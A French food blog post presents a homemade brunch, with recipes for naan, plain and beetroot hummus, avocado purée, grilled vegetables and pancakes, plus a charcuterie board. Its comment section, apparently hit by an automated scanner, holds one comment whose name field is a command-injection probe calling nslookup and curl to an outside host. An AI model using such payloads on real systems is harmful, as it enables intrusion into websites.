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Brunch Planche et Tartinade

☀ Salut les Hanamiens,

Voici un brunch maison aux multiples facettes, Planche bien garnie, petits Pains en tout genre et Tartinades à gogo !

Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade

L’idée du jour est de réaliser un brunch en toute simplicité autour d’une planche salée bien garnie et de petits pains à toaster de diverses manières. Je l’ai testé en mode brunch un dimanche midi, mais également pour un apéritif dînatoire et mes invités étaient toujours ravis. Les amoureux du salé vont adorer tandis que la partie sucrée, moins importante, s’apparente à un petit déjeuner. C’est là que vous retrouverez vraiment l’univers du brunch, le mariage entre les viennoiseries du matin et les petits plats du midi.

Au menu de ce Brunch spécial Planche et Tartinade :

* Planche de charcuterie, radis, cornichons, poisson fumé et fromages *

* Tartines houmous nature et betterave, purée d’avocat & légumes grillés *

* Tartines de confiture, pâte à tartiner et fruits frais & secs *

Qui dit tartines dit Petits Pains ou autres supports moelleux ou croustillants à garnir de toutes les belles choses qui vous ont mis l'eau à la bouche juste avant, vous aurez ainsi le choix entre :

* Petits pains  « English muffins » *

* Pains style « naan » assaisonnés *

* Pancakes *

Rien de complexe dans ce brunch, mais la multitude de petites choses à préparer augmente votre temps passé en cuisine. La purée d'avocat et les différents pains et pancakes sont à préparer de préférence le jour même, pour le reste, la veille sans problème. Ce brunch est vraiment adapté pour un grand nombre de personnes, car au lieu de préparer plusieurs petites portions, chacun prépare une bonne portion d'un plat en particulier, vous réduisez le temps passé en cuisine tout en conservant la foule de bons petits plats. Je vous propose des quantités pour 6 personnes mais je vous conseille d'adapter les proportions en fonction de vos envies et du nombre de convives bien sûr.

Recettes :  6 personnes

Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade

muffins anglais ou « English muffins »

Ces petits pains seront le compagnon parfait de vos tartines, à ne pas confondre avec les pâtisseries du même nom. Vous en avez peut-être déjà croisé sans le savoir, ces charmants petits pains arrondis dont la préparation est simple mais le temps de repos un peu long. Je vous conseille de les préparer le jour même pour qu'ils soient bien moelleux à l'intérieur. Découvrez la recette dans cet article dédié (comptez 2-3 muffins par personne).

Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade ~ Muffins anglais ou "English muffins"

Pains style "Naan" assaisonnés

Le houmous est réputé pour s'accompagner de pain pita, large et épais mais je voulais quelque chose de plus fin et légèrement croustillant pour être à l'opposé des English muffins. J'ai découvert les naans dans un restaurant indien lorsque j'étais jeune et j'en ai gardé un excellent souvenir, je ne me rappelais que de ces larges pains fourrés de fromage d'ailleurs. Pour ce brunch je n'ai pas ajouté de garniture dans les naans mais les ai assaisonnés d'huile d'olive et d'herbes de Provence.

Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade ~ Pains style "Naan" assaisonnés

Pour 6-8 naans (tout dépend du diamètre de votre poêle, la quantité est adaptée pour environ 1 naan par personne  donc si vous êtes très gourmand, doublez-les en séparant la pâte en 2 pour le repos) :

Farine ~ 400 g

Lavure de boulanger ~ 1/2 sachet soit 5-6 g

Levure chimique ~  1/2 c.à.c

Sel ~  1 c.à.c

Sucre ~ 2 c.à.c

Huile d'olive ~  2 c.à.s

Yaourt nature ~  100 g

Eau ~  15-20 cl

 Assaisonnement ~ huile d'olive, herbes de Provence 

Matériel : saladier ou robot, rouleau à pâtisserie, poêle à crêpes

  1. Ajoutez les ingrédients dans un saladier ou un robot dans l'ordre suivant : 10 cl d'eau, farine en faisant un trou, levure de boulanger d'un côté et le sel à l'opposé, et le reste au milieu : levure chimique, sucre, huile d'olive et yaourt
  2. Pétrir pendant une dizaine de minute (vous obtenez des grumeaux encore)
  3. Ajoutez au fur et à mesure le reste d'eau, entre 5 et 10 cl jusqu'à obtenir une pâte lisse qui ne colle pas (sinon ajoutez un peu de farine)
  4. Couvrez le saladier d'un torchon et laissez reposer 1 à 2h à température ambiante ou à 30°C au four (la pâte doit gonfler)
  5. Prenez un morceau de pâte, environ 80 g et étalez-la au rouleau à pâtisserie sur un plan de travail fariné (formez ainsi un disque de pâte, pas plus large que la poêle)
  6. Huilez la poêle et déposez le disque de pâte dedans
  7. Faites chauffer environ 5 min (la pâte grille comme sur la photo)
  8. Avant de retourner la pâte sur l'autre côté, ajoutez un filet d'huile d'olive et des herbes de Provence
  9. Retournez le naan et chauffez également 5 min sur l'autre côté
  10. Votre naan est prêt, recommencez jusqu'à utiliser toute la pâte

Planche

On commence la dégustation avec une belle planche garnie de tout ce que vous voulez, voici quelques idées :

* Charcuterie : jambon blanc et cru (acheté à la découpe, en fine tranche, c'est meilleur), saucisson, coppa, mortadelle.

* Poisson fumé : truite ou saumon (la première étant moins chère).

* Fromage : comté (incontournable pour la jurassienne que je suis), chèvre, bleu, fromage frais à tartiner, Caprice

* Radis, cornichons et amandes pour compléter la planche.

Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade ~ Planche de Charcuterie, truite fumée et fromages

Houmous Nature et Betterave

Pour la suite, j'ai préparé du houmous, un top pour les tartinades et très tendance en ce moment. Version nature et à la betterave, c'est vraiment excellent et ça se marie très bien avec les autres accompagnements. Se prépare à l'avance sans problème, simplissime, vous avez juste besoin d'un bon mixeur.

Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade ~ Houmous Nature et Betterave

Pois chiches ~ boîte de conserve de 400 g soit 265 g égoutté

 Tahin (ou purée de sésame blanc) ~ 3 c.à.s

Citron ~ 1

Huile d'olive ~ 2-c.à.s

Gousse d'ail ~ 1/4 ou 1 entière

Sel ~ 1 c.à.c

 Betterave cuite et épluchée ~ 100 g

  Assaisonnement ~ paprika, coriandre ou persil

Matériel : mixeur

  1. Égouttez les pois chiches en conservant 3 c.à.s de jus
  2. Facultatif : épluchez les pois chiches avec vos petites mains (j'ai lu que c'était une étape indispensable mais pour avoir fait la recette avec et sans, je n'ai pas relevé de différences de goût, j'ai cependant trouvé que les pois chiches se mixaient plus facilement sans la peau, sachez en tout cas que cette étape prend environ 15 min)
  3. Mixez les pois chiches avec les ingrédients liquides : 3 c.à.s de jus, le jus de citron et l'huile d'olive (étape la plus difficile au final car les pois chiches sont plaqués sur les côtés du mixeur et la lame passe à côté, commencez donc par mixer une petite quantité et rajoutez des pois chiches au fur et à mesure en décollant les morceaux si besoin)
  4. Continuez de mixer jusqu'à obtenir les textures désirez : un peu granuleuse ou bien crémeuse
  5. Ajoutez le tahin, le sel, un peu de paprika et l'ail pressé (ou finement découpé, mais attention avec l'ail, on le sent beaucoup et très vite même en ajoutant une petite quantité donc allez-y doucement et progressivement, 1/4 gousse en premier) puis mixez de nouveau
  6. Ajustez la texture du houmous : ajoutez davantage de jus si vous trouvez la préparation trop épaisse
  7. Goûtez et ajustez l'assaisonnement comme bon vous semble : votre houmous nature est prêt
  8. Découpez grossièrement la betterave en dés puis mixez (pas de problème ici)
  9. Ajoutez 1/3 du houmous nature à la betterave, ajoutez du persil ou de la coriandre et mixez de nouveau
  10. Goûtez et ajustez l'assaisonnement comme bon vous semble : votre houmous betterave est prêt
  11. Décorez vos bocaux/bol de houmous nature d'un filet d'huile d'olive/paprika, et betterave de persil/coriandre

Purée d'avocat

L'avocat reste un incontournable des brunchs et convient parfaitement en tartine. Je vous l'ai déjà proposé en tartine avec un œuf mollet, un vrai régal.

Avocat ~ 3

Citron ~ 2

Huile d'olive ~  2 c.à.s

Assaisonnement ~  coriandre, paprika, poivre & sel

  1. Découpez les avocats en 2 et prélevez la chair par parti morceau pour la déposez dans un bol
  2. Réduisez l'avocat en purée avec le dos d'une fourchette
  3. Ajoutez le jus d'un citron, l'huile d'olive et l'assaisonnement
  4. Goûtez et ajustez l'assaisonnement si besoin
Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade ~ Purée d'avocat

Légumes grillés

Agrémentez vos tartines de houmous et d'avocat de légumes grillés divers et variés : tomate, courgette, poivron et champignon sont de très bons exemples. Je les ai préparé séparément et disposé dans de mini ramequin comme certains ingrédients ne sont pas au goût de tout le monde.

Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade ~ Légumes grillés

Tomate ~ 2

Courgette ~ 1

Poivron ~  2

Champignons de Paris ~  10 gros

Huile ~  filet

Assaisonnement ~  herbes de Provence, poivre & sel

Matériel : poêle ou four

  1. Découpez les légumes : en tranche pour la courgette et les champignons, en 1/8 pour les tomates et en lamelles pour les poivrons
  2. Faites griller les légumes à la poêle dans un filet d'huile ou au four à 180°C

Cette dégustation salée devrait bien vous remplir la panse, mais si vous avez encore un peu de place, je vous propose de continuer avec la partie sucrée.

Pancakes

Je vous ai déjà proposé une recette de pancakes dans ma première version du brunch maison et je l'ai légèrement modifié pour avoir des pancakes plus gonflés et aérés en battant tout simplement les blancs en neige.

Farine ~ 200 g

Levure chimique ~ 1 sachet

Sucre ~ 25 g

Sucre vanillé ~ 1 sachet

Sel 1 pincée

Oeuf ~ 2

Beurre fondu ~ 50 g

Lait ~ 20 cl

 Matériel  saladier, poêle, fouet, louche, spatule en bois

  1. Mélangez la farine, la levure, le sucre, le sucre vanillé et le sel dans un saladier
  2. Ajoutez les jaunes d'œuf, le beurre fondu et le lait
  3. Mélangez avec un fouet jusqu'à obtenir une pâte très épaisse et homogène
  4. Battre les blancs en neige et les incorporer doucement à la pâte (elle devient alors moins épaisse)
  5. Mettez une poêle sur feu moyen et déposez de la pâte au centre de la poêle (≈ 50 g), elle va légèrement et naturellement s'étaler pour avoir la forme désirée
  6. Après 2-3 mins, retournez le pancake (rapidement, car sinon la partie encore molle du dessus va couler)
  7. Laissez cuire 1-2 min sur l'autre face et hop s'est prêt !
Carnet Hanami ♥ Brunch Maison spécial Planche et Tartinade ~ Pancakes

Tartines de confiture, pâte à tartiner et fruits frais & secs

Pour terminer ce brunch sur une note sucrée, pancakes et English muffins seront tartinés de petites douceurs en tout genre :

* Pâte à tartiner : je craque toujours pour le Nutella et son goût inimitable mais j'ai tout de même tenté de faire ma propre pâte à tartiner à base de cacao, poudre de noisette, lait concentré, sucre et huile. Bon, le résultat n'est pas trop mal mais l'aspect granuleux de la pâte me dérange vraiment. Le goût est certes bien chocolaté, mais je n'adhère pas, pas quand on est tellement habitué à l'inimitable... c'est mal je sais !  La prochaine fois je testerai l'huile de noisette pour avoir une pâte bien lisse.

* Confiture : une valeur sûre, il m'en reste de la maison mais j'adore aussi acheter plusieurs petits pots pour déguster différents parfums.

* Fruits frais et secs : agrémentez tout ça de quelques fruits frais (le top c'est les fraises, bananes, kiwi, pommes...) et de fruits secs tels que des amandes, noix, noisettes. 

J'espère que vous passerez un bon moment en savourant ce brunch, un moment convivial avec vos proches. Je vous préviens, vous roulerez peut être par terre à la fin du repas  tellement vous serez repus 😂.

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Commentaires: 18
  • #1

    MySbnftY (mercredi, 29 décembre 2021 01:05)

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  • #2

    MySbnftY (mercredi, 29 décembre 2021)

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  • #3

    MmzHrrdb (dimanche, 01 septembre 2024 08:16)

    20

  • #4

    MmzHrrdb (dimanche, 01 septembre 2024 08:17)

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  • #5

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

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  • #6

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

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  • #7

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

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  • #8

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

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  • #9

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

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  • #10

    MmzHrrdb (dimanche, 01 septembre 2024 08:22)

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  • #11

    |(nslookup${IFS}-q${IFS}cname${IFS}hitnutalgqgxp0868a.bxss.me||curl${IFS}hitnutalgqgxp0868a.bxss.me) (dimanche, 01 septembre 2024 08:22)

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  • #12

    MmzHrrdb (dimanche, 01 septembre 2024 08:23)

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  • #13

    MmzHrrdb (dimanche, 01 septembre 2024 08:24)

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  • #14

    MmzHrrdb (dimanche, 01 septembre 2024 08:24)

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  • #15

    MmzHrrdb (dimanche, 01 septembre 2024 08:25)

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  • #16

    MmzHrrdb (dimanche, 01 septembre 2024 08:25)

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  • #17

    MmzHrrdb (dimanche, 01 septembre 2024 08:26)

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  • #18

    MmzHrrdb (dimanche, 01 septembre 2024 08:26)

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